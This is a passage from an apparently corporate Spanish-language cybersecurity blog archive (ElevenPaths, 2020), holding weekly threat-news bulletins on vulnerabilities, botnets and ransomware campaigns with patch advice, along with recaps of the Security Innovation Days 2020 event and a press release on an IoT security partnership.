completo, lo que permite al atacante añadir un archivo powershell.exe malicioso. Ambas vulnerabilidades pueden ser mitigadas con listas de control de acceso (ACL), estableciendo permisos más restrictivos a las carpetas locales de Citrix. Desde Citrix recomiendan actualizar Citrix Gateway Plug-in a una versión corregida lo antes posible. Más información: https://cymptom.com/gateway2hell-multiple-privilege-escalation-vulnerabilities-in-citrix-gateway-plug-in/2020/10/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
23 de octubre de 2020
Innovación y nuevas herramientas de ciberseguridad: Security Innovation Days 2020 (Día 3)
Hasta aquí la VIII edición del Security Innovation Days 2020. Tres intensas jornadas en las que la innovación en ciberseguridad y la transformación digital han sido las protagonistas. Para esta última reservamos el plato fuerte y la seña de identidad de este evento: la presentación de los últimos proyectos y herramientas en las que han estado trabajando nuestros equipos. Introducción La jornada comenzaba de nuevo con una introducción por parte de Mónica Carrillo. Nuevos productos, servicios, herramientas y, en definitiva, los últimos desarrollos en innovación para ofrecer a nuestros clientes exactamente lo que necesitan. Telefónica Innovation Ventures La sesión comenzaba por todo lo alto, con un importante anuncio que se había hecho oficial apenas unas horas antes. Guenia Gawendo, Directora de Telefónica Innovation Ventures, y Raúl Riesco, Responsable de AAPP e Inversiones estratégicas de ElevenPaths, eran los encargados de presentar el nuevo proyecto de Telefónica Tech Ventures, un vehículo de inversión de Telefónica e impulsado por ElevenPaths que tiene como objetivo detectar nuevas oportunidades relacionadas con la innovación disruptiva en ciberseguridad. Guenia Gawendo durante su intervención Magnet A continuación, como primera ponencia centrada propiamente en nuevos desarrollos, el equipo de CTO, representado por Gonzalo Fernández y David López Meco, presentaba el proyecto Magnet, una iniciativa desarrollada íntegramente durante este complicado 2020 que ofrece seguridad y conectividad para PYMEs. La prueba de que es posible desarrollar producto de manera remota. El equipo de CTO, representado por Gonzalo Álvarez y David López Meco ElevenLabs Llegábamos al plato fuerte de la jornada, nuestro equipo del Área de Innovación y Laboratorio presentaba las últimas herramientas, con su director a la cabeza, Sergio De Los Santos, acompañado de un equipo de lujo: Jose Torres, Helene Aguirre, José A. Cascallana, Gabriel Álvarez, Félix Brezo y David Vara. Un Área que ha crecido mucho durante este último año, añadiendo nuestros centros de innovación que tenemos alrededor de España: TEGRA, C4IN y SOTH, además de nuestros queridos Chief Security Ambassadors (CSAs), repartidos por 5 países. Si quieres descubir más sobre las herramientas presentadas, aquí puedes encontrar más información: Deeder, herramienta para firmar contratos a través de plataformas de mensajería instantánea Aldara, la herramienta inteligente para redes sociales Aristeo: en progreso desde C4IN (C 4.0 con Cidaut Ameba TheTHE, herramienta para equipos de Threat Hunting IDoT, Identity of Things Más desarrollos del equipo de Innovación y Laboratorio: AMSIExt, ChainLock o DoH (DNS over HTTPS). Jose Torres y Sergio de los Santos durante su intervención en remoto Patrocinador Netskope Contamos también con la visión de nuestro partner Netskope sobre la nueva era de la ciberseguridad, en la que SASE y el cloud serán piezas clave. Una gran ponencia a cargo de Samuel Bonete, Regional Sales Manager para Iberia. Un placer poder contar con vosotros. Samuel Bonete, Regional Sales Manager Iberia de Netskope Despedida No podríamos llamarlo Security Innovation Days sin la presencia de nuestro Chairman Chema Alonso, que contó la historia y evolución de ElevenPaths y cómo hemos llegado a esta Nueva Era y sus nuevos proyectos como CDCO de Telefónica. Un cierre de lujo firmado por nuestro Chairman, Chema Alonso Muchas gracias a todos los asistentes, estamos muy contentos con la acogida y la participación en esta edición tan particular ¡hasta el año que viene! A continuación, el vídeo completo de esta tercera jornada:
23 de octubre de 2020
Ciberseguridad y negocio en la nueva era: Security Innovation Days 2020 (Día 1)
Primer día del Security Innovation Days 2020 completado con más de 1500 personas conectadas desde todos los rincones del mundo. Si te has perdido la primera jornada de nuestro evento de innovación en ciberseguridad, no te preocupes, a continuación te dejamos un completo resumen para que puedas revivir esta primera aproximación centrada en el negocio y en cómo la ciberseguridad resulta clave en el proceso de transformación digital de compañías de todos los sectores. Introducción - Keynote Telefónica Tech El evento comenzaba con una introducción por parte de la presentadora y conductora del evento, Mónica Carrillo, en la que explicaba el funcionamiento del evento de este año: tres jornadas completamente online en la que nuestros expertos y varios de nuestros partners presentarán la nueva era de la ciberseguridad, The New Era. Una octava edición muy especial por varios motivos: Encuentro virtual: por razones obvias, la edición de este 2020 se realiza de manera 100% online, permitiendo asistir a compañeros, clientes y personas interesadas en la ciberseguridad de todos los rincones del mundo Tres jornadas: tenemos mucho que contar, por eso hemos decidido pasar de una única jornada a tres, separando las ponencias por temática y facilitando la asistencia Telefónica Tech: esta edición es la primera que celebramos como compañía parte del holding Telefónica Tech, a pocas semanas de cumplirse un año de este anuncio Tras la introducción exponiendo las principales características de ElevenPaths y cómo se engloba dentro del holding Telefónica Tech, y quien mejor que el propio CEO de Telefónica Tech, José Cerdán, mediante una conexión desde plató a Distrito Telefónica), para explicar las capacidades digitales del holding y de qué manera se ofrece al cliente ciberseguridad, junto a Cloud, Internet of Things (IoT) y Big Data. Se destacaron los cuatro pilares en los que se apoya la creación de ElevenPaths como compañía: confianza, crecimiento, eficiencia y motivación, muy alineados con la estrategia global del grupo Telefónica y que nos permitirá crecer maximizando valor y maximizar también la entrega de valor a nuestros clientes a la más alta calidad. En definitiva, ElevenPaths es el partner de confianza que cualquier empresa necesita para afrontar la transformación digital de forma segura. Patrocinador Gold: Zscaler La primera ponencia correspondía a uno de los patrocinadores del evento, Zscaler. Jay Chaudhry, su CEO y fundador explicaba su propuesta de valor como socio estratégico de ElevenPaths, colaborando para que los proyectos de sus clientes sean más fuertes que nunca. Comenzaba destacando la importancia del futuro a corto y medio plazo, un futuro en el que la ciberseguridad será de vital importancia. Prevé que la siguiente década estará llena de disrupción y oportunidades, y nosotros no podemos estar más de acuerdo: Welcome to The New Era. Jay Chaudhry, CEO Zscaler New Perimeter Entramos en materia: turno para nuestros expertos en producto, aquellos que están más cerca de los desarrollos y las tendencias del mercado, tomaban el plató para explicar qué es y qué abarca el nuevo perímetro de la ciberseguridad. Alberto Sempere, Director Global de Producto y Alianzas de ElevenPaths dirigía la ponencia, centrada alrededor de varios de los temas más importantes del presente, y sobre todo del futuro de la ciberseguridad. Para explicar cada uno de los temas pasaron por plató los encargados de Cloud, Miguel Ángel Pérez Acevedo, Jefe de Producto de Seguridad en la Nube Global y Marketing de Productos Españoles de ElevenPaths, Ciberseguridad Industrial Vicente Segura, Responsable de IoT y Seguridad IoT de Telefónica y David Prieto, Responsable de Riesgo, compliance, Identidad y Servicios de ElevenPaths, con una demo de nuestro servicio SealSign. Tendencias que son una realidad hoy en día y que marcarán la diferencia en los próximos meses. Vicente Segura junto a Alberto Sempere y Miguel Ángel Pérez Acevedo Mesa redonda Internacional CISOs Llegamos a uno de los platos fuertes del día, una mesa redonda internacional con CISOs de varios clientes que aportaron su visión sobre el panorama de la ciberseguridad. En esta ponencia participaron: José Luis Domínguez, VP de Desarrollo de Negocio de Cliente de ElevenPaths Maximiliano Lewinsky, Country Manager de Telefónica Cybersecurity Tech en Reino Unido, Alemania y USA Luis Urzúa, Country Manager de Telefónica Cybersecurity Tech en Chile Mariluz Garín, CISO de Eroski Jorge Venegas, Jefe de Ciberseguridad de Caja de Compensación Los Andes Oran Hollander, Head of Cybersecurity de O2 Alemania José Luis Domínguez y Maximiliano Lewinsky conectados a la mesa redonda desde plató Patrocinador Gold: Palo Alto Networks Para finalizar la jornada, llegaba la oportunidad para otro de nuestros partners y patrocinadores Gold del evento, Palo Alto Networks. Su CTO y fundador, Nir Zuk, exponía su visión del futuro de la ciberseguridad y cómo estamos trabajando juntos para alcanzar nuestros objetivos. Conexión con California para hablar con Nir Zuk, CTO y fundador de Palo Alto Networks Despedida Hasta aquí el resumen de la primera jornada, con ponencias muy interesantes y que sin duda nos deja con ganas de más. Todavía quedan dos jornadas en las que presentaremos las últimas herramientas en las que hemos estado trabajando, nuestra propuesta alrededor del talento y las personas y las últimas capacidades que hemos adquirido en consultoría y formación. A continuación, os dejamos el vídeo completo de la primera sesión. Welcome to The New Era. Si quieres saber más sobre el Security Innovation Days 2020, consulta los siguientes artículos:
21 de octubre de 2020
Noticias de Ciberseguridad: Boletín semanal 10-16 de octubre
Coalición de compañías del sector IT tratan de eliminar la botnet TrickBot Un conglomerado de compañías del sector tecnológico conformado por Microsoft, FS-ISAC, ESET, Lumen's Black Lotus Labs, NTT, y Symantec, han participado en la eliminación de la botnet TrickBot. Durante los últimos meses, estas compañías han realizado investigaciones sobre la infraestructura, incluidos todos los servidores Command & Control (C2) que la botnet utilizó para controlar los dispositivos infectados y los distintos módulos del malware de TrickBot con el fin de conocer el funcionamiento interno. Para ello, llegaron a recolectar más de 125.000 muestras. En base a estas evidencias, Microsoft ha presentado ante los tribunales la solicitud de que se deshabiliten las direcciones IP, se hagan inaccesibles los servidores C2 y se suspendan todos los servicios a los operadores de dicha botnet. Consecuentemente, dicha solicitud fue aprobada y actualmente se está contactando con ISPs y CERTs de todo el mundo para informar a todos los usuarios afectados. Según las compañías implicadas en esta investigación, la botnet de TrickBot en cuestión habría infectado a más de un millón de equipos informáticos, entre los que se incluyen dispositivos IoT. Tras conocerse la denuncia ante los tribunales, varias fuentes estarían indicando que los servidores Command & Control (C2) y los dominios eliminados de esta botnet habrían sido reemplazados por una nueva infraestructura. Investigadores de seguridad de ESET, Microsoft y Symantec han informado de que la eliminación completa de Trickbot no iba a ser posible, y estimaban que los efectos de las acciones realizadas serían temporales y limitados. Esto evidenciaría la compleja infraestructura de la botnet, debido a que se ejecuta en sistemas de alojamiento que no colaboran, o actúan lentamente. Asimismo, se indica que los hechos realizados tuvieron efectos directos como un incremento de los costes para el mantenimiento de la botnet TrickBot o retrasos en las operaciones de malware en activo. Otro de los objetivos llevados a cabo era intentar dañar la reputación de TrickBot en el ámbito del Crime as a Service. En último lugar, cabe destacar que Microsoft ha logrado sentar un nuevo precedente legal debido a que demostró que el malware TrickBot utilizó el código de Windows con fines maliciosos, en contra de los términos de servicio del kit de desarrollo de software (SDK). Más información: https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/ https://www.zdnet.com/article/trickbot-botnet-survives-takedown-attempt-but-microsoft-sets-new-legal-precedent/ BazarLoader utilizado para desplegar Ryuk ransomware Los operadores del grupo TrickBot apuntan cada vez a objetivos más importantes con el uso del nuevo troyano sigiloso BazarLoader antes del despliegue del ransomware Ryuk. El grupo de malware Bazar busca pasar desapercibido a través de la firma de malware y solo carga inicialmente una funcionalidad mínima del código malicioso. Este enfoque mejora la posibilidad de que el malware persista a largo plazo dentro de las redes más seguras. Un compromiso con BazarLoader comienza con un ataque de phishing dirigido. Tras la infección del equipo, BazarLoader utilizará el proceso de vaciado para inyectar el componente BazarBackdoor en procesos legítimos de Windows, creando una tarea programada para cargar BazarLoader cada vez que un usuario inicia sesión en el sistema. Finalmente, BazarBackdoor desplegará una baliza Cobalt Strike que proporciona acceso remoto a los actores de amenazas que instalan herramientas posteriores a la explotación. Algunos investigadores han desarrollado reglas YARA para la detección de BazarBackdoor. Más detalles: https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de actualizaciones, conocido como Patch Tuesday, en el que la compañía ha corregido 87 vulnerabilidades en varios de sus productos, de las cuales 12 han sido clasificadas como críticas. El fallo de mayor gravedad (CVE-2020-16898, CVSS 9.8) se trata de una vulnerabilidad RCE en la pila TCP/IP de Windows debido a la forma en la que maneja los mensajes ICMPv6 Router Advertisement (RA). Este fallo podría ser explotado mediante el envío de paquetes ICMPv6 Router Advertisment maliciosos. El fallo CVE-2020-16947, con CVSS 8.1, es una vulnerabilidad de ejecución remota de código (RCE) en Microsoft Outlook, que se podría aprovechar engañando a la víctima para que abra un archivo especialmente diseñado con una versión vulnerable de Outlook. Para estos dos fallos se espera detectar intentos de explotación inminentes. Otras vulnerabilidades a tener en cuenta son otro fallo RCE en SharePoint, CVE-2020-16952 (CVSS 8.6), la cual tiene una PoC disponible, y el fallo CVE-2020-16938 (CVSS 5.5) para el que se ha divulgado información que podría facilitar su explotación. Se recomienda aplicar los parches lo antes posible. Toda la información: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Oct BleedingTooth: Vulnerabilidad en BlueZ Tanto Google como Intel están advirtiendo a los usuarios de una vulnerabilidad de severidad alta en BlueZ, la pila del protocolo Bluetooth de los dispositivos basados en Linux. El fallo (CVE-2020-12351, CVSS 8.3), denominado BleedingTooth por Google, puede ser explotado en un ataque Zero-Click por un agente amenaza no autenticado. Un atacante remoto situado a corta distancia que conozca la dirección Bluetooth (BD_ADDR) de la víctima, podría enviar un paquete l2cap malicioso y provocar una denegación de servicio o llegar a elevar sus privilegios a nivel del kernel y lograr la ejecución de código arbitrario. Ambas compañías instan a los usuarios a actualizar el kernel de Linux a la versión 5.9 o superior. Más detalles: https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq Nueva campaña de distribución de Emotet Investigadores de seguridad han detectado una nueva campaña de distribución de Emotet en la que los actores amenaza afirman ser del servicio de Windows Update, e indican a los usuarios que Microsoft Office debe ser actualizado. Con esta nueva forma de distribución, los operadores de Emotet muestran una nueva plantilla, siendo la tercera desde que reapareció el pasado mes de julio. Como es habitual en estos casos, los usuarios que reciben estos correos maliciosos, normalmente desde direcciones legítimas suplantadas o comprometidas, tienen que permitir manualmente que se ejecuten las macros del documento .doc adjunto. Para ello la víctima debe pulsar el botón "Habilitar edición". Según algunos casos analizados, tras desplegarse Emotet en el equipo de la víctima, se instalaría el troyano TrickBot. Para esta campaña, la distribución estaría siendo masiva, afectando a usuarios de todo el mundo. Más información: https://www.zdnet.com/article/new-emotet-attacks-use-fake-windows-update-lures/
16 de octubre de 2020
Noticias de Ciberseguridad: Boletín semanal 3-9 de octubre
Detectada nueva botnet que elimina datos del dispositivo infectado Un grupo de investigadores de la empresa Netlab 360 publicaron en el día de ayer sus descubrimientos más recientes sobre una nueva botnet especializada en eliminar todas las particiones y datos de los dispositivos infectados. Denominada HEH, se trata de una botnet que se propaga a través de ataques de fuerza bruta contra cualquier tipo de dispositivo conectado a la red y que tenga los puertos SSH (23 y 2323) expuestos. Una vez vulneradas las claves de acceso (normalmente débiles o por defecto), se procede a la descarga de hasta siete binarios para realizar las actividades maliciosas, que consisten principalmente en continuar la propagación vía fuerza bruta y la ejecución de comandos en Shell para borrar los datos del dispositivo. Si bien la botnet tiene capacidad de infectar cualquier dispositivo expuesto con puertos SSH poco seguros, su malware solo funciona en plataformas *NIX. Los investigadores creen que tanto la botnet como el malware todavía está en fase de desarrollo, por lo que no se descarta que sume nuevas capacidades pronto. Más detalles: https://blog.netlab.360.com/heh-an-iot-p2p-botnet/ Suplantación de entidades bancarias en redes sociales Investigadores de ESET han informado de una campaña de suplantación de entidades financieras en redes sociales con el fin de obtener información personal de clientes y realizar estafas telefónicas con posterioridad. La investigación comenzó tras la recepción de un mensaje privado por Instagram proveniente de una cuenta que se hacía pasar por Banco de Galicia (entidad que opera en Argentina). Este mensaje genérico intentaba establecer un primer contacto con las víctimas para obtener su número de teléfono para ser atendido por atención al cliente ante un reclamo o consulta. Al observar la cuenta desde la que era enviado, la cual hacía uso del nombre y logo de la entidad, se observaba que esta era una cuenta falsa. Este caso se ha detectado también otras redes sociales como Facebook y Twitter, así como con otras entidades bancarias. Por el momento Banco de Galicia tomó la decisión de cerrar sus cuentas en Instagram con el fin de evitar engaños a sus clientes. Desde ESET recomiendan extremar la precaución y nunca proporcionar información personal a cuentas con apariencia sospechosa o sin verificar. Toda la información: https://www.welivesecurity.com/la-es/2020/10/05/falsas-cuentas-instagram-atencion-cliente-bancos/ Múltiples vulnerabilidades en el HP Device Manager La firma tecnológica HP ha publicado una alerta de seguridad para informar sobre tres vulnerabilidades críticas en el HP Device Manager cuya explotación podría comprometer los sistemas afectados. Los errores identificados han sido catalogados como CVE-2020-6925, CVE-2020-6926 y CVE-2020-6927. Además, Según HP, dos de las tres vulnerabilidades (CVE-2020-6925, CVE-2020-6926) afectan a todas las versiones de HP Device Manager. Para mitigar el riesgo de explotación de CVE-2020-6927, los usuarios pueden descargar la versión 5.0.4 de HP Device Manager. Sobre los otros dos errores, la compañía aún no ha lanzado actualizaciones, aunque ha emitido algunas recomendaciones para su mitigación parcial: Limitar el acceso entrante a los puertos 1099 y 40002 del Administrador de Dispositivos a IPs confiables o solo localhost. Eliminar la cuenta dm_postgres de la base de datos de Postgres. Actualizar la contraseña de la cuenta dm_postgres dentro de HP Device Manager Configuration Manager. Más: https://es-la.tenable.com/blog/cve-2020-6925-cve-2020-6926-cve-2020-6927-multiple-vulnerabilities-in-hp-device-manager Vulnerabilidades críticas en Helpdesk de QNAP QNAP ha corregido dos vulnerabilidades críticas (CVE-2020-2506 y CVE-2020-2507) en la aplicación Helpdesk. Esta herramienta viene integrada en los dispositivos NAS de QNAP y permite el soporte de forma remota, lo que posibilita la conexión remota al dispositivo con el permiso del propietario. Ambas vulnerabilidades son debido a un control de acceso inadecuado que, si son explotadas con éxito, podrían permitir a los atacantes obtener el control de un dispositivo QNAP. Desde QNAP recomiendan actualizar Helpdesk a la última versión lo antes posible. QNAP emitió recientemente un aviso de seguridad sobre un aumento en los ataques del ransomware AgeLocker contra dispositivos NAS expuestos. Más información: https://www.qnap.com/en/security-advisory/QSA-20-08 Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
9 de octubre de 2020
Security Innovation Days 2020: The New Era
Ciberseguridad en la era de la Transformación Digital No hay lugar a dudas, vivimos en una época de cambios a todos los niveles. Son tantos que ya se habla de un cambio de época, un cambio de era. Uno de los campos que más rápido evoluciona y más cambios produce es la tecnología, permitiendo a las empresas transformarse digitalmente a pasos agigantados. Dentro de esa transformación digital, necesaria en todos los sectores, encontramos la ciberseguridad como uno de los principales pilares en los que debe asentarse el nuevo ecosistema empresarial. Sin una estrategia consistente en seguridad y la aportación de los recursos adecuados, no será posible hacer frente a la necesaria transformación digital. Desde ElevenPaths, la compañía de ciberseguridad de Telefónica, estamos trabajando en esa dirección, permitiendo a las empresas transformarse de manera segura llevándolas a la nueva era, The New Era. Aquellas compañías que apuesten por la seguridad como una de las bases de su transformación y adaptación a los nuevos tiempos, estarán más y mejor preparadas para triunfar en un futuro que ya está aquí. La nueva era de la ciberseguridad ya está aquí Si quieres conocer todos los detalles de cómo va a ser la Nueva Era de la ciberseguridad, no puedes perderte nuestro evento anual destinado a la innovación. Este año, en un formato 100% online, celebramos la VIII edición del Security Innovation Days, tres jornadas en las que podrás conocer de primera mano los proyectos en los que estamos trabajando, demostraciones de lo que está por venir y, en definitiva, una mirada a la nueva era de la ciberseguridad de la mano de nuestros expertos. Resérvate los días 20, 21 y 22 de octubre y conoce cómo hacemos frente a la transformación digital junto a la ciberseguridad. ¡No te pierdas Security Innovation Days 2020! The New Era ya está aquí. https://www.youtube.com/watch?v=nvMcS55Ahlg Descubre la agenda en la web oficial del evento: REGÍSTRATE AQUÍ
7 de octubre de 2020
Noticias de Ciberseguridad: Boletín semanal 26 de septiembre-2 de octubre
El gigante logístico CMA CGM afectado por un ciberataque Esta semana, el grupo francés de logística CMA CGM, que opera en 160 países distintos, informaba a través de su página web y sus redes sociales de un ciberataque contra sus sistemas. Al parecer, el incidente habría afectado a varios servidores perimetrales, obligando a la entidad a interrumpir el acceso a internet de algunas de sus aplicaciones para evitar la propagación del malware dentro de su red. Como consecuencia, la entidad recomienda a sus clientes que contacten con las agencias locales del grupo para cualquier petición, reserva u otro tipo de operaciones. Pese a que el grupo no ha desvelado el tipo de malware causante del incidente, algunas comunicaciones apuntan al ransomware RagnarLocker, que habría logrado infectar varias de las oficinas de CMA CGM en territorio chino. Más información: https://www.cmacgm-group.com/en/news-media/important-notice-external-access-to-CMA-CGM-IT-applications Logran compilar e instalar Windows XP y Server 2003 a partir del código fuente filtrado El 24 de septiembre, varios usuarios de 4chan y Reddit informaban de la filtración del código fuente de Windows XP, que más tarde aparecería filtrado en uno de estos foros, confirmando varios investigadores la legitimidad del mismo. Ahora, el desarrollador NTDEV ha publicado dos vídeos en YouTube y varios tweets en los que muestra cómo compilar Windows XP y Server 2003 desde el ‘Simbolo del Sistema’ de otro Windows XP, si bien el desarrollador reconoce que a diferencia del código de Windows Server 2003, en el caso de Windows XP todavía no ha podido generar una imagen ISO para compartir. Este código podría estar relacionado con la fuga del pasado 26 de julio en el que se hizo público un repositorio en GitLab que contenía el código de más de 50 compañías entre las que se encontraba Microsoft. Esta filtración podría afectar a diversas instituciones públicas o a cajeros automáticos que siguen utilizando Windows XP a pesar de que ya no cuenta con soporte. Los agentes amenaza podrían analizar este código en busca de vulnerabilidades que se podrían explotar también en versiones más actuales. Más información: https://www.genbeta.com/windows/logran-compilar-ejecutar-windows-xp-server-2003-a-partir-codigo-fuente-filtrado-asi-proceso-video Microsoft aclara la confusión con los parches para el fallo de Windows Zerologon Microsoft ha aclarado los pasos que los clientes deben tomar para asegurarse de que sus dispositivos estén protegidos contra ataques usando exploits de Windows Server Zerologon (CVE-2020-1472). La compañía publicó una nueva versión de su aviso después de que los clientes encontraran confusa la guía original y no estuvieran seguros de si aplicando el parche era suficiente para proteger de los ataques a los dispositivos Windows Server vulnerables. En un proceso paso a paso, el aviso actualizado ahora explica las acciones exactas que los administradores deben seguir para asegurarse de que sus entornos están protegidos y se eviten las interrupciones en caso de un ataque entrante diseñado para explotar servidores que de otro modo serían vulnerables a los exploits de Zerologon. Las acciones a llevar a cabo descritas por Microsoft son las siguientes: ACTUALIZAR los controladores de dominio con la actualización publicada el 11 de agosto de 2020 o más tarde. BUSCAR qué dispositivos están realizando conexiones sospchosas mediante la monitorización de los registros de eventos. DIRIGIRSE a los dispositivos que no cumplen con las normas y que están haciendo estas conexiones. HABILITAR el modo de ejecución para abordar el CVE-2020-1472 en su entorno. Todos lo detalles: https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc Campaña de phishing aprovecha permisos de lectura de aplicaciones de terceros en O365 Proofpoint ha publicado un informe sobre una nueva técnica utilizada por el actor TA2552 desde agosto de 2019 en la que abusa del acceso a aplicaciones de terceros (3PA) de Microsoft Office 365. En concreto, se envía un correo electrónico a usuarios de España y América Latina con un mensaje que insta a los usuarios a hacer clic en un enlace y los redirige a una página de consentimiento de aplicaciones legítimas de terceros de Microsoft. En esta página, se les solicita que otorguen permisos de solo lectura a su cuenta de O365 a través de OAuth2 u otros métodos de autorización basados en token. A través de esta técnica, TA2552 pretende obtener permisos para ver el contenido y la actividad de los recursos disponibles, como los contactos y el correo del usuario, a través de la cuenta O365 de un usuario. El acceso de solo lectura conlleva un riesgo considerable, ya que proporciona a los atacantes la capacidad de acceder a información valiosa que podría ser utilizada en ataques tipo BEC o apropiación de cuentas, robar datos de forma silenciosa, o para interceptar mensajes de restablecimiento de contraseña de otras cuentas, como las de instituciones financieras. Más: https://www.proofpoint.com/us/blog/threat-insight/ta2552-uses-oauth-access-token-phishing-exploit-read-only-risks Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
2 de octubre de 2020
ElevenPaths de Telefónica refuerza sus capacidades de seguridad en IoT global con Subex
Esta colaboración ofrece la detección de amenazas en IoT, un servicio de vigilancia y respuesta a incidentes en entornos de IoT. Esta solución tiene la capacidad de aprender y modelar el comportamiento legítimo de los dispositivos de IoT mediante el análisis de tráfico y la aplicación de técnicas de Machine Learning para detectar anomalías y posibles incidentes de ciberseguridad. ElevenPaths, la empresa de ciberseguridad de Telefónica, da un paso más en la protección de IoT y los entornos convergentes con la firma de un acuerdo de asociación global con Subex, con el fin de ofrecer el servicio de detección de amenazas IoT en todo el mundo. Este servicio de vigilancia y respuesta a incidentes aprovechará el Machine Learning y las técnicas específicas de inteligencia de amenazas de IoT/OT para perfilar el comportamiento de los dispositivos de IoT y las redes asociadas. De esta manera, permitirá detectar y responder a las anomalías o ciberataques que puedan afectar a los distintos elementos integrales en IoT (dispositivos, red de comunicaciones o plataformas de servicios). El servicio se alimenta de una red mundial de honeypots (sistema "señuelo" diseñado para ser el objetivo de un ataque para detectarlo y obtener más información) especializada en IoT/OT. Esta red está distribuida por todo el mundo en más de 60 ubicaciones y cubre más de 500 arquitecturas de sistemas diferentes, procesando un promedio de 10 millones de sofisticados ciberataques cada día. La amplia experiencia de Telefónica en la gestión de redes permite el acceso a la información de tráfico que será analizada más adelante utilizando las capacidades de Subex. Además, los clientes pueden obtener todos los beneficios de un servicio gestionado a través de la experiencia en operaciones de Telefónica, apoyándose en el SOC (Security Operations Centre) de ElevenPaths, que cuenta con sedes en once centros del planeta y con el apoyo de expertos especialmente formados en esta tecnología. IoT Threat Detection aborda varios desafíos urgentes IoT: Mayor detectabilidad y visibilidad de los dispositivos IoT que forman parte de la infraestructura, así como de los servicios de las organizaciones, para comprender su comportamiento legítimo. Protección holística de las organizaciones, donde los dispositivos IoT deben considerarse como una parte cada vez más importante de toda la infraestructura a proteger. La mayoría de las veces, estos elementos pueden ser el eslabón más débil debido a su dispersión, su accesibilidad física y la inexistencia o deficiencia de los controles de seguridad. La necesidad de contar con soluciones capaces de escalar a las dimensiones que requieren las infraestructuras IoT, así como de disponer de fuentes y mecanismos para generar una ciberinteligencia específica en este campo que garantice la eficacia y la fiabilidad de los sistemas de detección. Entre los muchos beneficios de este servicio, al ser una solución sin agente, libera de la necesidad de instalar software en los dispositivos IoT. Dada la dimensión intrínseca de IoT y los limitados recursos asociados a muchos de estos dispositivos, este factor constituye una gran ventaja. Asimismo, como el análisis se realiza sobre una copia del tráfico, la solución no afecta en ningún momento el tráfico original del servicio IoT o sus SLA. La gran mayoría de nuestros clientes de casi cualquier sector en el que nos centramos han lanzado -o lanzarán a corto plazo- proyectos e iniciativas en los que las tecnologías IoT son clave. Si bien las posibilidades en términos de nuevos servicios y mejoras de la eficiencia son enormes, también significan una mayor exposición a los riesgos de seguridad que deben gestionarse adecuadamente. Este acuerdo con Subex nos permite proporcionar un servicio de supervisión y respuesta a incidentes de primera clase para los entornos de IoT. Alberto Sempere, Director de Global de Productos de Ciberseguridad en ElevenPaths. Nuestra asociación con ElevenPaths se basa en ofrecer a las empresas una nueva clase de seguridad empresarial que abarca entornos, dispositivos, estrategias de seguridad cibernética y amenazas regionales y globales para ofrecer una verdadera ciberresistencia que sea profunda, sólida y sostenible. Estamos entusiasmados por las posibilidades que esta alianza trae consigo específicamente en áreas como el equipamiento conjunto de las empresas para hacer frente a las ciberamenazas existentes y emergentes con un alto nivel de confianza y seguridad. Kiran Zachariah, VP de Seguridad Digital de Subex Nota de prensa completa
30 de septiembre de 2020
Noticias de Ciberseguridad: Boletín semanal 19-25 de septiembre
Nuevo vector de ataque para vulnerabilidad en Citrix Workspace El investigador de seguridad de Pen Test Partners, Ceri Coburn, ha descubierto un nuevo vector de ataque para la vulnerabilidad CVE-2020-8207 en Citrix Workspace corregida en julio de este año. El problema se encuentra en una vulnerabilidad de inyección remota en la línea de comandos que permitiría a los atacantes evadir los instaladores MSI firmados por Citrix mediante una transformación MSI maliciosa. Estas transformaciones MSI permiten alterar la base de datos del archivo MSI antes de su instalación. Al poder controlar los argumentos de comandos que se pasan a msiexec, se podría insertar la ruta en una transformación maliciosa, pero haciendo uso de un MSI legítimo de Citrix. Desde Citrix se ha publicado una actualización para corregir esta nueva casuística. Más detalles: https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/ Exploits para Zerologon utilizados activamente Microsoft ha advertido en una serie de Tweets que los atacantes estarían utilizando activamente la vulnerabilidad de Windows Server catalogada como CVE-2020-1472 en ataques y aconseja a todos los administradores de Windows que instalen las actualizaciones de seguridad necesarias. Esta vulnerabilidad fue denominada 'Zerologon' por la firma de ciberseguridad Secura y, cuando se explota, permite a los atacantes elevar sus privilegios a un administrador de dominio y tomar el control de un dominio. En estos tweets se incluyen tres ejemplos que, según Microsoft, se utilizaron en los ataques para explotar la vulnerabilidad de elevación de privilegios Netlogon CVE-2020-1472. Los ejemplos son ejecutables .NET con el nombre de archivo 'SharpZeroLogon.exe' y se pueden encontrar en VirusTotal. Se recomienda encarecidamente a todos los administradores de Windows Server que instalen la actualización de seguridad para la CVE-2020-1472 siguiendo las instrucciones del boletín de soporte de Microsoft. Más info: https://www.bleepingcomputer.com/news/microsoft/microsoft-hackers-using-zerologon-exploits-in-attacks-patch-now/ Fallo en Firefox permite secuestrar navegadores vía WiFi Mozilla ha corregido un fallo en el navegador Firefox para dispositivos Android que permitiría secuestrar todos los navegadores vulnerables que se encuentren en la misma red WiFi y obligar a los usuarios a acceder a sitios web maliciosos. La vulnerabilidad reside en la implementación del protocolo Simple Service Discovery Protocol (SSDP) de Firefox, el cual permite encontrar otros dispositivos en la misma red con el fin de compartir o recibir contenido. En versiones vulnerables de Firefox, se podría aprovechar este protocolo para enviar comandos maliciosos al navegador de la víctima. El fallo fue corregido en Firefox 79, por lo que se recomienda actualizar el navegador lo antes posible. Toda la información: 